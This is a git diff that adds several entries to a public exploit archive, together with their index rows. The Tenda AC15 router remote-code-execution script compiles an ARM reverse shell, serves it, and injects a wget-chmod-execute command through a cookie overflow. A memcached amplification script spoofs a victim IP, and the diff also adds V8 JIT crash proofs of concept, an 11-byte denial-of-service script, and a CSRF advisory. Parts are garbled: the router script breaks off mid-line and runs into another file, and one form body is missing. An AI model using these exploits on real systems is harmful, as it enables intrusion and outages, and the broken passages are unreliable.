diff --git a/exploits/hardware/remote/44253.py b/exploits/hardware/remote/44253.py new file mode 100755 index 000000000..7bdb6cb4d --- /dev/null +++ b/exploits/hardware/remote/44253.py @@ -0,0 +1,243 @@ +#!/usr/bin/env python +# EDB Note ~ Source: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/ +import urllib2 +import struct +import time +import socket +from optparse import * +import SimpleHTTPServer +import SocketServer +import threading +import sys +import os +import subprocess + +ARM_REV_SHELL = ( +"#include \n" +"#include \n" +"#include \n" +"#include \n" +"#include \n" +"int main(int argc, char **argv)\n" +"{\n" +" struct sockaddr_in addr;\n" +" socklen_t addrlen;\n" +" int sock = socket(AF_INET, SOCK_STREAM, 0);\n" + +" memset(&addr, 0x00, sizeof(addr));\n" + +" addr.sin_family = AF_INET;\n" +" addr.sin_port = htons(%d);\n" +" addr.sin_addr.s_addr = inet_addr(\"%s\");\n" + +" int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n" + +" dup2(sock, 0);\n" +" dup2(sock, 1);\n" +" dup2(sock, 2);\n" + +" system(\"/bin/sh\");\n" +"}\n" +) + +REV_PORT = 31337 +HTTPD_PORT = 8888 +DONE = False + +""" +* This function creates a listening socket on port +* REV_PORT. When a connection is accepted it updates +* the global DONE flag to indicate successful exploitation. +* It then jumps into a loop whereby the user can send remote +* commands to the device, interacting with a spawned /bin/sh +* process. +""" +def threaded_listener(): + global DONE + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) + + host = ("0.0.0.0", REV_PORT) + + try: + s.bind(host) + except: + print "[+] Error binding to %d" %REV_PORT + return -1 + + + print "[+] Connect back listener running on port %d" %REV_PORT + + s.listen(1) + conn, host = s.accept() + + #We got a connection, lets make the exploit thread aware + DONE = True + + print "[+] Got connect back from %s" %host[0] + print "[+] Entering command loop, enter exit to quit" + + #Loop continuosly, simple reverse shell interface. + while True: + print "#", + cmd = raw_input() + if cmd == "exit": + break + if cmd == '': + continue + + conn.send(cmd + "\n") + + print conn.recv(4096) + +""" +* Take the ARM_REV_SHELL code and modify it with +* the given ip and port to connect back to. +* This function then compiles the code into an +* ARM binary. +@Param comp_path – This should be the path of the cross-compiler. +@Param my_ip – The IP address of the system running this code. +""" +def compile_shell(comp_path, my_ip): + global ARM_REV_SHELL + outfile = open("a.c", "w") + + ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip) + + outfile.write(ARM_REV_SHELL) + outfile.close() + + compile_cmd = [comp_path, "a.c","-o", "a"] + + s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE) + + while s.poll() == None: + continue + + if s.returncode == 0: + return True + else: + print "[x] Error compiling code, check compiler? Read the README?" + return False + +""" +* This function uses the SimpleHTTPServer module to create +* a http server that will serve our malicious binary. +* This function is called as a thread, as a daemon process. +""" +def start_http_server(): + Handler = SimpleHTTPServer.SimpleHTTPRequestHandler + httpd = SocketServer.TCPServer(("", HTTPD_PORT), Handler) + + print "[+] Http server started on port %d" %HTTPD_PORT + httpd.serve_forever() + + +""" +* This function presents the actual vulnerability exploited. +* The Cookie header has a password field that is vulnerable to +* a sscanf buffer overflow, we make use of 2 ROP gadgets to +* bypass DEP/NX, and can brute force ASLR due to a watchdog +* process restarting any processes that crash. +* This function will continually make malicious requests to the +* devices web interface until the DONE flag is set to True. +@Param host – the ip address of the target. +@Param port – the port the webserver is running on. +@Param my_ip – The ip address of the attacking system. +""" +def exploit(host, port, my_ip): + global DONE + url = "http://%s:%s/goform/exeCommand"%(host, port) + i = 0 + + command = "wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;" %(my_ip, HTTPD_PORT) + + #Guess the same libc base continuosly + libc_base = **** + curr_libc = libc_base + (0x7c << 12) + + system = struct.pack(". +# +# This was created to better understand the memcrashed exploit +# brought to light thanks to CloudFlare. +# (https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/) +# +# Please sysadmin responsibly. + +import requests +import memcache +import re + +from scapy.all import * + +# Vulnerable memcached server list +SERVER_LIST = [ + '172.17.0.2:11211', +] + +# Destination +TARGET = '1.2.3.4' + +# optional payload to set if no keys exist +payload = requests.get('https://google.com').text +payload_key = 'fuckit' + +# this forces payload to load into memory for being extra-evil and efficient +if not payload: + print 'Could not import payload, continuing anyway' + +try: + for server in SERVER_LIST: + if ':' in server: + server = server.split(':')[0] + + ip = IP(src=TARGET, dst=server) + packet_base = '\x00\x00\x00\x00\x00\x01\x00\x00{0}\r\n' + + # fetch known keys by id + statitems_packet = packet_base.format('stats items') + udp = UDP(sport=50000, dport=11211)/statitems_packet + keyids = [] + resp = sr1(ip/udp) + for key in str(resp.payload).split('\r\n'): + # Skip first line which has hex in it (I'm lazy) + if 'age' in key: + key = key.split(':')[1] + keyids.append(key) + + # fetch names for keys by id + keys = [] + for kid in keyids: + query = 'stats cachedump {0} 100'.format(kid) + keyid_packet = packet_base.format(query) + udp = UDP(sport=50000, dport=11211)/keyid_packet + resp = str(sr1(ip/udp).payload).split('\r\n') + for key in resp: + if 'ITEM' in key: + res = re.match(r"(.*)ITEM (?P\w+)(.*)",key) + keys.append(res.group('keyname')) + + # if keys not present on target, make one + if not keys: + mc = memcache.Client([server],debug=False) + mc.set(payload_key, payload) + keys.append(payload_key) + + # iterate thru known keys and blast away + for key in keys: + query = 'get {0}'.format(key) + fun_packet = packet_base.format(query) + udp = UDP(sport=50000, dport=11211)/fun_packet + sr1(ip/udp) + +except Exception: + raise \ No newline at end of file diff --git a/exploits/multiple/dos/44257.js b/exploits/multiple/dos/44257.js new file mode 100644 index 000000000..b0accbbe9 --- /dev/null +++ b/exploits/multiple/dos/44257.js @@ -0,0 +1,72 @@ +/* +I think this commit has introduced the bugs: https://chromium.googlesource.com/v8/v8/+/c22ca7f73ba92f22d0cd29b06bb2944a545a8d3e%5E%21/#F0 + +Here's a snippet. + case IrOpcode::kStoreField: { + FieldAccess access = FieldAccessOf(node->op()); + Node* value_node = node->InputAt(1); + NodeInfo* input_info = GetInfo(value_node); + MachineRepresentation field_representation = + access.machine_type.representation(); + + // Make sure we convert to Smi if possible. This should help write + // barrier elimination. + if (field_representation == MachineRepresentation::kTagged && + TypeOf(value_node)->Is(Type::SignedSmall())) { + field_representation = MachineRepresentation::kTaggedSigned; + } + WriteBarrierKind write_barrier_kind = WriteBarrierKindFor( + access.base_is_tagged, field_representation, access.offset, + access.type, input_info->representation(), value_node); + + ProcessInput(node, 0, UseInfoForBasePointer(access)); + ProcessInput(node, 1, + TruncatingUseInfoFromRepresentation(field_representation)); + ProcessRemainingInputs(node, 2); + SetOutput(node, MachineRepresentation::kNone); + if (lower()) { + if (write_barrier_kind < access.write_barrier_kind) { + access.write_barrier_kind = write_barrier_kind; + NodeProperties::ChangeOp( + node, jsgraph_->simplified()->StoreField(access)); + } + } + return; + } + +Since Smi stores can be performed without write barriers, if it's possible to convert to Smi, it tries to help write barrier elimination by changing field_representation to MachineRepresentation::kTaggedSigned as noted in the comment. But whether or not field_representation has changed, it uses TruncatingUseInfoFromRepresentation to process the value node. + +But TruncatingUseInfoFromRepresentation(kTaggedSigned) returns UseInfo::AnyTagged() which is also compatible with kTaggedPointer. So even in the case where input_info->representation() is kTaggedPointer and the value is a heap object, it may eliminate the write barrier. + +Note: It's the same when handling kStoreElement. + +PoC 1 using kStoreField. +*/ + +var a, b; // should be var +for (var i = 0; i < 100000; i++) { + b = 1; + a = i + -0; // -0 is a number, so this will make "a" a heap object. + b = a; +} + +print(a === b); // true +gc(); +print(a === b); // false +print(b); + +/* +PoC 2 using kStoreElement. +let arr = [{}]; +var v; // should be var +for (var i = 0; i < 700000; i++) { + arr[0] = 1; + v = i + -0; + arr[0] = v; +} + +print(arr[0] === v) // true +gc(); +print(arr[0] === v) // false +print(arr[0]); +*/ \ No newline at end of file diff --git a/exploits/multiple/dos/44258.js b/exploits/multiple/dos/44258.js new file mode 100644 index 000000000..27a19f793 --- /dev/null +++ b/exploits/multiple/dos/44258.js @@ -0,0 +1,31 @@ +/* +I think this commit has introduced the bug. +https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/#F2 + +According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null". + +The following check has to guarantee it, but it can't guarantee it. Any receiver can get through the check, then Map::GetObjectCreateMap may transition the prototype, which may lead to type confusion. + if (!prototype_const->IsNull(isolate()) && !prototype_const->IsJSReceiver()) { + return NoChange(); + } + instance_map = Map::GetObjectCreateMap(prototype_const); + +PoC: +*/ + +var object; +function opt() { + opt['x'] = 1.1; + try { + Object.create(object); + } catch (e) { + } + + for (let i = 0; i < 1000000; i++) { + + } +} + +opt(); +object = opt; +opt(); \ No newline at end of file diff --git a/exploits/multiple/dos/44259.js b/exploits/multiple/dos/44259.js new file mode 100644 index 000000000..dca53a163 --- /dev/null +++ b/exploits/multiple/dos/44259.js @@ -0,0 +1,47 @@ +PoC: +function* opt(arg = () => arg) { + let tmp = opt.x; // LdaNamedProperty + for (;;) { + arg; + yield; + + function inner() { + tmp; + } + + break; + } +} + +for (let i = 0; i < 100000; i++) { + opt(); +} + +/* +PoC for release build: +function* opt(arg = () => { + arg; + this; +}, opt) { + let tmp = arg.x; + for (;;) { + arg; + yield; + + tmp = { + inner() { + tmp; + } + }; + } +} + +for (let i = 0; i < 10000; i++) { + opt(); +} + +What happened: +1. The LdaNamedProperty operation "opt.x" was lowered to a graph exit in the graph builder. This set the current environment to nullptr (BytecodeGraphBuilder::ApplyEarlyReduction). +2. The environment for the next block (for-loop) was supposed to be created from merging with the previous environment, but it had been set to nullptr at 1. So the context value remained as "undefined". +3. But GetSpecializationContext directly casted the context value to Context* which resulted in type confusion. +*/ \ No newline at end of file diff --git a/exploits/multiple/dos/44260.js b/exploits/multiple/dos/44260.js new file mode 100644 index 000000000..8a6784b0a --- /dev/null +++ b/exploits/multiple/dos/44260.js @@ -0,0 +1,57 @@ +/* +In the current implementation, the bytecode generator also emits empty jump tables. +https://cs.chromium.org/chromium/src/v8/src/interpreter/bytecode-array-writer.cc?rcl=111e990462823c9faeee06b67c0dcf05749d4da8&l=89 + +So the bytecode for the example code would be generated as follows: +Code: +function* opt() { + for (;;) + if (true) { + + } else { + yield; // never reaches, never hits BindJumpTableEntry + } +} + +Bytecode: + ... + 0x35dda532a2a5 @ 75 : 90 04 01 01 SwitchOnSmiNoFeedback [4], [1], [1] { } <<--- SIZE: 1, but EMPTY + ... + + +Here's a snippet of JumpTableTargetOffsets::iterator::UpdateAndAdvanceToValid which is used to enumerate a jump table. +void JumpTableTargetOffsets::iterator::UpdateAndAdvanceToValid() { + if (table_offset_ >= table_end_) return; + + current_ = accessor_->GetConstantAtIndex(table_offset_); + Isolate* isolate = accessor_->bytecode_array()->GetIsolate(); + while (current_->IsTheHole(isolate)) { + ++table_offset_; + ++index_; + current_ = accessor_->GetConstantAtIndex(table_offset_); + } +} + +If the jump table is empty, table_offset_ may exceed table_end_. As a result, out-of-bounds reads occur. + +PoC: +*/ + +function* opt() { + for (;;) + if (true) { + + } else { + yield; + } + + for (;;) + if (true) { + + } else { + yield; yield; yield; yield; yield; yield; yield; yield; + } +} + +for (let i = 0; i < 100000; i++) + opt(); \ No newline at end of file diff --git a/exploits/multiple/webapps/44256.html b/exploits/multiple/webapps/44256.html new file mode 100644 index 000000000..dfc2409e5 --- /dev/null +++ b/exploits/multiple/webapps/44256.html @@ -0,0 +1,98 @@ +Exploit Title: Bravo Tejari Web Portal-CSRF +CVE-ID: CVE-2018-7216 +Vulnerability Type: Cross Site Request Forgery (CSRF) +Vendor of Product: Tejari +Affected Product Code Base: Bravo Solution +Affected Component: Web Interface Management. +Attack Type: Local - Authenticated +Impact: Unauthorised Access +Category: WebApps +Author: Arvind V. +Author Social: @Find_Arvind + +Vulnerability Type: Cross Site Request Forgery (CSRF) +Vendor of Product: Tejari +Affected Product Code Base: Bravo Solution +Affected Component: Web Interface Management. +Attack Type: Local - Authenticated +Impact: Unauthorised Access + +Product description: +Bravo Tejari is a strategic procurement platform that enables organizations +to generate more value, influence innovation and reduce risk powered by a +unique supplier-centered approach that integrates supplier lifetime value +throughout the entire procurement process + +Attack Scenario: +The Web Interface of the Bravo Tejari procurement portal does not use +random tokens to block any kind of forged requests. An atacker can take +advantage of this scenario and create a forged request to edit user account +details like name, address of the company/individual, email address etc. He +then uses social engineering techniques to target specific individuals +whose account details he would like to change. He simply sends the link and +tricks the user into clicking the forged http request. The request is +executed and user account details are changed without his knowledge. + +Proof of Concept Code: +Forged HTTP Request used by the attacker: + + + +
+ + + + + + + + + + + + + + + + + + + + +
+ + + + +Impact: +The affected product is a procurement portal and so all communication +regarding the contract lifecycle process is sent to user details provided +on the portal. If this vulnerability is sucessfully exploited, the attacker +will be able to change these details which will potentially affect the +victim's business. + +Recommendation: +Ensure that all sensitive CRUD Operations are appropriately protected with +random tokens. Alternatively, the sensitive operations should also have an +authentication layer to confirm user verification. + +References: +http://seclists.org/fulldisclosure/2018/Feb/44 +https://packetstormsecurity.com/files/146409/Tejari-Cross-Site-Request-Forgery.html + +https://www.securityfocus.com/archive/1/541782/30/0/threaded + +Credit: Arvind Vishwakarma +http://ultimateone1.blogspot.ae/ + + + +Vulnerability Timeline: +12th December 2017 – Vulnerability Discovered +23rd December 2017 – Contacted Vendor – No Response +7th January 2018 – Contacted Vendor again – No Response +15th February 2018 – Vulnerability Disclosed \ No newline at end of file diff --git a/exploits/windows/dos/44255.txt b/exploits/windows/dos/44255.txt new file mode 100644 index 000000000..4daa50742 --- /dev/null +++ b/exploits/windows/dos/44255.txt @@ -0,0 +1,109 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt +[+] ISR: Apparition Security + + +Vendor: +============= +www.softros.com +https://nts.softros.com/downloads/ + + +Product: +=========== +Network Time System Server v2.3.4 +Both x86/x64 versions + + +Network Time System provides a solution to system time maintenance problems. This powerful client/server software enables you to set up a +virtually fail-safe synchronized time environment for networks of any size and complexity, from small office networks (LAN) to those +maintained at large enterprises (VPN, VLAN, WAN), from single site networks to those including numerous domains and involving complex +routing techniques. Network Time System allows the creation of a custom source of precise time in a corporate network environment +establishing an interconnected time synchronization system for each and every machine and device on the company network. + + +Vulnerability Type: +=================== +Denial Of Service + + + +CVE Reference: +============== +CVE-2018-7658 + + +Security Issue: +================ +Network Time System (Server) "NTSServerSvc" service listens on Port 7001, unauthenticated remote attackers can crash the +Server by sending exactly 11 bytes to the target system. Systems which may depend on critical time synchronization +could then potentially be impacted. + + +Stack dump: + +''' +eax=0320119a ebx=0000000b ecx=000000ff edx=00000000 esi=03167040 edi=0050b328 +eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0 nv up ei ng nz ac pe cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297 +NTSServerSvc+0x69a5: +004069a5 880a mov byte ptr [edx],cl ds:0023:00000000=?? +Resetting default scope + +FAULTING_IP: +NTSServerSvc+69a5 +004069a5 880a mov byte ptr [edx],cl + +EXCEPTION_RECORD: (.exr -1) +ExceptionAddress: 004069a5 (NTSServerSvc+0x000069a5) + ExceptionCode: c0000005 (Access violation) + +''' + + +Exploit/POC: +============= +import socket +#Network Time System (Server) NTSServerSvc.exe v2.3.4 +#Softros Systems +#NTS Server service for time synchronization over network + +print 'Network Time Server 11 byte Denial Of Service' +print 'by hyp3rlinx' +HOST=raw_input('Network Time Server IP') +PORT=7001 +payload='A'*11 +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect((HOST,PORT)) +s.send(payload) +s.close() + + + +Network Access: +=============== +Remote + + +Severity: +========= +Medium + + +Disclosure Timeline: +============================= +Vendor Notification: February 10, 2018 +Second attempt : February 24, 2018 +Request CVE, assigned by Mitre : March 3, 2018 +March 5, 2018: Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 44dd04c66..51e510565 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5890,6 +5890,12 @@ id,file,description,date,author,type,platform,port 44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos, 44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple, 44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows, +44254,exploits/linux/dos/44254.py,"Memcached - 'memcrashed' Denial of Service",2018-03-05,"Alex Conrey",dos,linux,11211 +44255,exploits/windows/dos/44255.txt,"Softros Network Time System Server 2.3.4 - Denial of Service",2018-03-06,hyp3rlinx,dos,windows, +44257,exploits/multiple/dos/44257.js,"Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug",2018-03-06,"Google Security Research",dos,multiple, +44258,exploits/multiple/dos/44258.js,"Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_",2018-03-06,"Google Security Research",dos,multiple, +44259,exploits/multiple/dos/44259.js,"Chrome V8 JIT - 'GetSpecializationContext' Type Confusion",2018-03-06,"Google Security Research",dos,multiple, +44260,exploits/multiple/dos/44260.js,"Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read",2018-03-06,"Google Security Research",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -16299,6 +16305,7 @@ id,file,description,date,author,type,platform,port 44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php, 44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android, 44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23 +44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Unauthenticated Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -38564,7 +38571,7 @@ id,file,description,date,author,type,platform,port 42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php, 42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware, 42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php, -42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php, +42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php, 42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php, 42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php, 42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php, @@ -38961,4 +38968,5 @@ id,file,description,date,author,type,platform,port 44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php, 44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows, 44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80 -44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php, +44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php, +44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple,